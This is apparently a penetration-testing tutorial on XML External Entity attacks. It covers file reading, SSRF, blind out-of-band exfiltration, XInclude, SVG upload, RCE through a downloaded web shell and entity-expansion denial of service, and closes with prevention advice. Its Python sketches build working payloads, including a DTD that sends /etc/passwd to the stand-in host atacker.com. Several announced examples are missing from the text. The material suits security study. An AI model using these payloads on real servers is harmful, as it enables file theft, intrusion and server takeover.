XXE - XEE XML External Entity attacks
Sources
- HackTricks.
- Portswigger.
- HackTheBox
Basic concepts
What is XML?
XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data.
What are XML entities?
XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities &lt; and &gt; represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.
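As a small illustration of the built-in entities, the following Python sketch (standard library only, with a made-up sample value) escapes metacharacters before placing them in a document and shows the parser turning them back into characters.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Hypothetical data value containing XML metacharacters.
raw_value = "1 < 2 && 3 > 2"

# escape() replaces &, < and > with the built-in entities.
escaped = escape(raw_value)

# Once escaped, the value can sit inside an element without being read as markup.
document = f"<note>{escaped}</note>"

# The parser resolves the entities back to the original characters.
parsed_value = ET.fromstring(document).text
```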
What are XML elements?
Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example:
What is a document type definition?
The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD"), loaded from elsewhere (known as an "external DTD"), or a hybrid of the two.
The XML Document Type Definition (DTD) allows the validation of an XML document against a pre-defined document structure. The pre-defined document structure can be defined in the document itself or in an external file.
The following is an example of an XML document:
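A minimal sketch in Python, assuming a small email-style document: only the date element and the XML declaration are taken from the table in this section, and every other element name and value is a hypothetical placeholder.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample; only <date> and the declaration appear in the source table.
EMAIL_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<email>
  <date>01-01-2022</date>
  <sender>sender@example.com</sender>
  <body>Hello</body>
</email>
"""

root = ET.fromstring(EMAIL_XML)                 # root element: <email>
child_tags = [child.tag for child in root]      # tags of the child elements
date_value = root.find("date").text             # value between start-tag and end-tag
```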
whereas:
Key | Definition | Example |
---|---|---|
Tag | The keys of an XML document, usually wrapped with < and > characters. | <date> |
Entity | XML variables, usually wrapped with & and ; characters. | &lt; |
Element | The root element or any of its child elements, and its value is stored in between a start-tag and an end-tag. | <date>01-01-2022</date> |
Attribute | Optional specifications for any element that are stored in the tags, which may be used by the XML parser. | version="1.0" / encoding="UTF-8" |
Declaration | Usually the first line of an XML document, and defines the XML version and encoding to use when parsing it. | <?xml version="1.0" encoding="UTF-8"?> |
The DTD for this XML could be:
The above DTD can be placed within the XML document itself, right after the XML Declaration in the first line. Otherwise, it can be stored in an external file (e.g. email.dtd), and then referenced within the XML document with the SYSTEM keyword, as follows:
It is also possible to reference a DTD through a URL, as follows:
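The three placements described above can be sketched in Python as plain strings. The element names in this DTD and the example.com host are assumptions for illustration, not the original example. Note that Python's ElementTree only checks well-formedness and does not validate against the DTD.

```python
import xml.etree.ElementTree as ET

# Hypothetical DTD for a small <email> document (element names are assumptions).
EMAIL_DTD = """<!ELEMENT email (date, sender, body)>
<!ELEMENT date (#PCDATA)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT body (#PCDATA)>"""

BODY = "<email><date>01-01-2022</date><sender>a@example.com</sender><body>Hi</body></email>"

# 1. Internal DTD: declarations sit inside the DOCTYPE, right after the XML declaration.
internal = f'<?xml version="1.0"?>\n<!DOCTYPE email [\n{EMAIL_DTD}\n]>\n{BODY}'

# 2. External DTD stored in a file and referenced with the SYSTEM keyword.
external_file = f'<?xml version="1.0"?>\n<!DOCTYPE email SYSTEM "email.dtd">\n{BODY}'

# 3. External DTD referenced through a URL (hypothetical host).
external_url = f'<?xml version="1.0"?>\n<!DOCTYPE email SYSTEM "http://example.com/email.dtd">\n{BODY}'

# Parsing the internal variant succeeds; no validation is performed here.
root = ET.fromstring(internal)
```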
How do XML custom entities work?
XML allows custom entities (i.e. XML variables) to be defined within the DTD to allow refactoring of variables and reduce repetitive data. This can be done with the ENTITY keyword, which is followed by the entity name and its value, as follows:
This definition means that any usage of the entity reference &myentity; (between an ampersand & and a semicolon ;) within the XML document will be replaced with the defined value: "my entity value".
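A minimal sketch of this substitution using Python's standard library. The root element name foo is a placeholder, and the entity name and value are the ones mentioned above.

```python
import xml.etree.ElementTree as ET

# Internal (custom) entity declared in the DTD and referenced in the body.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY myentity "my entity value">
]>
<foo>&myentity;</foo>"""

# The parser substitutes the reference with the declared value.
expanded = ET.fromstring(DOCUMENT).text
```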
What are XML external entities?
XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:
The URL can use the file:// protocol, so external entities can be loaded from a file. For example:
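The two kinds of declaration can be sketched as follows. The URL and path are placeholders, and the entity name ext is an assumption. To show what a parser is asked to load without loading anything, the sketch registers an expat handler that only records the system identifier.

```python
from xml.parsers import expat

# Declarations of the two kinds described above (URL and path are placeholders).
HTTP_ENTITY = '<!ENTITY ext SYSTEM "http://normal-website.com">'
FILE_ENTITY = '<!ENTITY ext SYSTEM "file:///path/to/file">'

def requested_resources(document: str) -> list:
    """Return the system identifiers the parser asks for, without loading them."""
    requested = []

    def on_external_entity(context, base, system_id, public_id):
        requested.append(system_id)  # record only, never fetch
        return 1                     # non-zero tells expat to carry on

    parser = expat.ParserCreate()
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(document, True)
    return requested

doc = f"<!DOCTYPE foo [ {FILE_ENTITY} ]><foo>&ext;</foo>"
seen = requested_resources(doc)
```

A vulnerable parser would fetch each recorded identifier and inline its content where the handler here merely notes it.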
Note: We may also use the PUBLIC keyword instead of SYSTEM for loading external resources, which is used with publicly declared entities and standards, such as a language code (lang="en").
Classic XML External Entity
Base-encoded XML External Entity
This trick only works with PHP web applications:
Blind XML External Entity - Out of Band
Why are external entities accepted?
This is a snippet of PHP code that accepts external DTDs:
Allowing external DTDs is done in this line:
Main attacks
New Entity test
In this attack I'm going to test if a simple new ENTITY declaration is working:
1. Retrieve files
Modify the submitted XML in two ways:
- Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.
- Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.
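The two modifications above can be sketched as a small Python payload builder. The stockCheck and productId element names, the entity name xxe, and the assumption of a Unix-style absolute path are all illustrative; a real request body would keep the application's own structure.

```python
def build_file_read_payload(path: str) -> str:
    """Build a request body that asks the parser to inline a local file."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        # Step 1: DOCTYPE defining an external entity that points at the file.
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://{path}"> ]>\n'
        # Step 2: a data value that the application echoes back uses the entity.
        '<stockCheck><productId>&xxe;</productId></stockCheck>'
    )

payload = build_file_read_payload("/etc/passwd")
```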
On a Windows system, we may use c:/windows/system32/drivers/etc/hosts:
In a Linux server go for
Encoding techniques
This filter returns the file base64-encoded to avoid data loss and truncation.
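A short sketch of the decoding side, assuming the filter in question is PHP's php://filter wrapper with convert.base64-encode. The index.php target and the sample value are placeholders, since a real value would come from the application's response.

```python
import base64

# Assumed system identifier for the PHP filter (index.php is a placeholder target).
PHP_FILTER = "php://filter/convert.base64-encode/resource=index.php"

def decode_leaked_value(value: str) -> str:
    """Decode the base64 text that the application echoes back."""
    return base64.b64decode(value).decode("utf-8", errors="replace")

# Stand-in for a response value; a real one would come from the target.
sample_response_value = base64.b64encode(b"<?php echo 'hi'; ?>").decode("ascii")
recovered = decode_leaked_value(sample_response_value)
```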
2. Chaining XXE to SSRF attacks
To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value.
You would then make use of the defined entity in a data value within the XML.
See this lab with an example of exploitation
3. Blind XXE vulnerabilities
Sometimes the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.
Blind XXE requires the use of out-of-band techniques. One option is XML parameter entities, a special kind of XML entity that can only be referenced elsewhere within the DTD. The parameter entity (for example xxe) is declared with a percent character before its name and called as %xxe; just after the ENTITY definition.
You don't need to make use of the defined entity in a data value within the XML, as %xxe; already calls the entity.
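A minimal sketch of such a payload, built in Python. The callback URL and the foo element are hypothetical. The point is that the only reference to the entity is %xxe; inside the DTD.

```python
def build_blind_payload(callback_url: str) -> str:
    """Build a document whose DTD alone triggers the out-of-band request."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        # The parameter entity is declared with "%" and referenced as %xxe;
        # inside the DTD, so the body needs no entity reference at all.
        f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{callback_url}"> %xxe; ]>\n'
        '<foo>anything</foo>'
    )

payload = build_blind_payload("http://attacker.example/ping")
```

An incoming request on the callback host would then indicate that the parser resolves external parameter entities.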
4. Blind XXE with data exfiltration out-of-band (Blind XXE with OOB data exfiltration)
Alternative 1
1. Create a malicious.dtd file:
2. Serve our malicious.dtd from http://atacker.com/malicious.dtd.
3. Submit a payload to the victim via XXE (blind) with an XML parameter entity.
This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline.
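The three steps can be sketched in Python as two string builders. This follows the commonly documented pattern for this technique and is not necessarily the exact file the notes refer to. The entity names (file, eval, exfiltrate, xxe) and the x query parameter are assumptions.

```python
def build_exfil_dtd(file_path: str, collector_url: str) -> str:
    """Return the text of a DTD that leaks a file through a URL parameter."""
    return (
        # Read the target file into the parameter entity "file".
        f'<!ENTITY % file SYSTEM "file://{file_path}">\n'
        # Declare, at parse time, a second entity whose URL embeds %file;.
        # &#x25; is the character reference for "%", needed inside an entity value.
        f'<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM \'{collector_url}/?x=%file;\'>">\n'
        '%eval;\n'          # defines the exfiltrate entity
        '%exfiltrate;\n'    # requests the URL, carrying the file contents
    )

def build_trigger_payload(dtd_url: str) -> str:
    """Blind payload that makes the target fetch and interpret the DTD."""
    return f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe; ]>\n<foo/>'

dtd_text = build_exfil_dtd("/etc/passwd", "http://atacker.com")
trigger = build_trigger_payload("http://atacker.com/malicious.dtd")
```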
Alternative 2: Manual attack
Create a blind.dtd file with the following content and serve it from our Kali machine:
If the file we want to read had the content XXE_SAMPLE_DATA, then the file parameter would hold its base64-encoded data (WFhFX1NBTVBMRV9EQVRB). When the XML tries to reference the external oob parameter from our machine, it will request http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB. Finally, we can create a PHP script named index.php to decode this encoded content and place it in the same location as blind.dtd, since we will be serving both from there:
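The decoding step can also be sketched in Python instead of PHP. This is a substitute for the index.php script described above, not a copy of it. It assumes the data arrives in a content query parameter, as in the example URL.

```python
import base64
from urllib.parse import parse_qs, urlsplit

def decode_exfiltrated(request_target: str) -> str:
    """Extract and decode the base64 'content' parameter from a request target."""
    query = urlsplit(request_target).query
    # Base64 "+" would be read as a space by parse_qs; restore it before decoding.
    encoded = parse_qs(query)["content"][0].replace(" ", "+")
    return base64.b64decode(encoded).decode("utf-8", errors="replace")

decoded = decode_exfiltrated("/?content=WFhFX1NBTVBMRV9EQVRB")
```

The function can be called from any HTTP listener on the path of each incoming request.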
Now in the request:
The result:
Tip: In addition to storing our base64-encoded data as a parameter to our URL, we may utilize DNS OOB Exfiltration by placing the encoded data as a sub-domain for our URL (e.g. ENCODEDTEXT.our.website.com), and then use a tool like tcpdump to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through.
Alternative 3: XXEInjector
Clone the tool XXEInjector
Once cloned, we will save our potentially vulnerable request into a file xxe.req. We will place the word XXEINJECT as a position locator for the tool:
Now we can run the tool:
And see the logs under the newly created Log folder within the tool:
5. Blind XXE to retrieve data via error messages
An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.
- Trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:
Invoking the malicious external DTD may result in an error message like the following:
6. Blind XXE by repurposing a local DTD
If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.
Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.
For example, suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd, and this DTD file defines an entity called custom_entity. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd file by submitting a hybrid DTD like the following:
7. XInclude attack
In the following scenario, we cannot implement a classic/blind/OOB XXE attack because we don't control the entire XML document and so we cannot define the DOCTYPE element.
We can work around this restriction with XInclude. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. We can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where we only control a single item of data that is placed into a server-side XML document.
For instance:
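A hedged sketch of how an XInclude-aware processor treats such a value, using Python's xml.etree.ElementInclude with a stand-in loader so that nothing is read from disk. The foo wrapper element and the /etc/passwd target are illustrative.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

# The only part an attacker would control: a value placed into a server-side document.
INJECTED_VALUE = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)

requested = []

def fake_loader(href, parse, encoding=None):
    """Stand-in loader: records the request and returns dummy text, reads nothing."""
    requested.append((href, parse))
    return "FAKE FILE CONTENT"

root = ET.fromstring(INJECTED_VALUE)
ElementInclude.include(root, loader=fake_loader)   # replaces xi:include with the text
included_text = root.text
```

No DOCTYPE is involved: the include directive alone makes the processor ask for the referenced resource.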
8. XXE via file upload
In a file upload feature, if the application expects to receive a format like .png or .jpeg, then the image processing library is likely to accept .svg too. Since SVG is an XML-based format, an uploaded SVG file can carry an XXE payload.
Our XXE payload could be:
9. Remote Code Execution: PHP + XXE
In addition to reading local files, we may be able to gain code execution over the remote server. On PHP-based web applications, we may be able to execute commands through the php://expect wrapper, though this requires the PHP expect module to be installed and enabled.
The most efficient method to turn XXE into RCE is by fetching a web shell from our server and writing it to the web app, and then we can interact with it to execute commands.
Now we can use the following XML code to execute a curl command that downloads our web shell onto the remote server:
Note: We replaced all spaces in the above XML code with $IFS, to avoid breaking the XML syntax. Furthermore, many other characters like |, >, and { may break the code, so we should avoid using them.
See https://airman604.medium.com/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
10. Denial of Service (DOS)
Finally, one common use of XXE attacks is causing a Denial of Service (DOS) on the hosting web server, with the following payload:
This payload defines the a0 entity as DOS, references it in a1 multiple times, references a1 in a2 multiple times, and so on, until the back-end server's memory runs out because each level multiplies the size of the expanded text. However, this attack no longer works with modern web servers (e.g., Apache), as they protect against this kind of entity expansion.
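The growth can be illustrated safely with a deliberately tiny version of the same structure. In this Python sketch the levels and fanout parameters are hypothetical knobs and the email root element is an assumption. With 3 levels and a fanout of 2, the text grows to only 8 copies.

```python
import xml.etree.ElementTree as ET

def nested_entity_document(levels: int, fanout: int) -> str:
    """Build a document whose entities each reference the previous one `fanout` times."""
    decls = ['<!ENTITY a0 "DOS">']
    for i in range(1, levels + 1):
        refs = f"&a{i - 1};" * fanout
        decls.append(f'<!ENTITY a{i} "{refs}">')
    return f'<!DOCTYPE email [ {" ".join(decls)} ]><email>&a{levels};</email>'

# Deliberately tiny: 3 levels with fanout 2 expand to 2**3 = 8 copies of "DOS".
small = nested_entity_document(levels=3, fanout=2)
expanded = ET.fromstring(small).text
```

The expanded size is fanout ** levels copies of the base string, which is why a handful of short declarations can exhaust memory on a parser without expansion limits.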
11. Advanced Data Exfiltration with CDATA
Alternative 1
We can utilize another method to extract any kind of data (including binary data) for any web application backend.
To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA tag (e.g. <![CDATA[ FILE_CONTENT ]]>). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.
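The effect of CDATA wrapping can be checked with a short Python sketch. The sample content and the root element name are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Content that would break the document if placed directly in an element.
raw = "a < b && c > d"

wrapped = f"<root><![CDATA[{raw}]]></root>"

# Inside CDATA the parser treats <, > and & as plain characters.
parsed = ET.fromstring(wrapped).text
```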
One easy way to tackle this issue would be to define a begin internal entity with <![CDATA[, an end internal entity with ]]>, and then place our external entity file in between, so that it is considered a CDATA element, as follows:
However, this may not work, because XML prevents joining internal and external entities in some cases, so we will have to find a better way to do so.
Alternative 2
To bypass the previous limitation, we can utilize XML Parameter Entities, a special type of entity that starts with a % character and can only be used within the DTD. What's unique about parameter entities is that if we reference them from an external source (e.g., a DTD hosted on our own server), all of them are treated as external and can be joined.
So the final attack would be:
In the attacking payload that is uploaded to the target server:
Note: In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop).
12. Error Based XXE
Another situation we may find ourselves in is one where the web application might not write any output, so we cannot control any of the XML input entities to write its content. Let's consider the exercise we have in /error at the end of this section, in which none of the XML input entities is displayed on the screen.
Because of this, we have no entity that we can control to write the file output. First, let's try to send malformed XML data, and see if the web application displays any errors.
Next, we create a malicious.dtd file on our attacker machine and serve it:
We will do the following request:
Prevention
Avoiding Outdated Components
While other input validation web vulnerabilities are usually prevented through secure coding practices (e.g., XSS, IDOR, SQLi, OS Injection), this is not entirely necessary to prevent XXE vulnerabilities. This is because XML input is usually not handled manually by the web developers but by the built-in XML libraries instead. So, if a web application is vulnerable to XXE, this is very likely due to an outdated XML library that parses the XML data.
- For example, PHP's libxml_disable_entity_loader function is deprecated (as of PHP 8.0), since it allows a developer to enable external entities in an unsafe manner, which leads to XXE vulnerabilities.
In addition to updating the XML libraries, we should also update any components that parse XML input, such as API libraries like SOAP.
Using Safe XML Configurations
Other than using the latest XML libraries, certain XML configurations for web applications can help reduce the possibility of XXE exploitation. These include:
- Disable referencing custom Document Type Definitions (DTDs)
- Disable referencing External XML Entities
- Disable Parameter Entity processing
- Disable support for XInclude
- Prevent Entity Reference Loops
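As one illustration of the first item, the following Python sketch rejects any incoming document that carries a DOCTYPE, using the standard library's expat bindings. The function and exception names are hypothetical, and other languages and libraries expose their own switches for the same settings.

```python
from xml.parsers import expat

class DoctypeForbidden(ValueError):
    """Raised when an incoming document carries a DOCTYPE declaration."""

def element_names_without_dtd(xml_text: str) -> list:
    """Parse untrusted XML, refusing any document that declares a DTD."""
    names = []

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid_doctype   # no DTD, so no custom entities
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_text, True)
    return names
```

Because custom, external, and parameter entities can only be declared inside a DTD, refusing the DOCTYPE outright covers the first three items of the list at once, at the cost of rejecting legitimate documents that rely on a DTD.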
Additionally, we should always disable displaying runtime errors in web servers.
With the various issues and vulnerabilities introduced by XML data, many also recommend using other formats, such as JSON or YAML.
Finally, using Web Application Firewalls (WAFs) is another layer of protection against XXE exploitation. However, we should never entirely rely on WAFs and leave the back-end vulnerable, as WAFs can always be bypassed.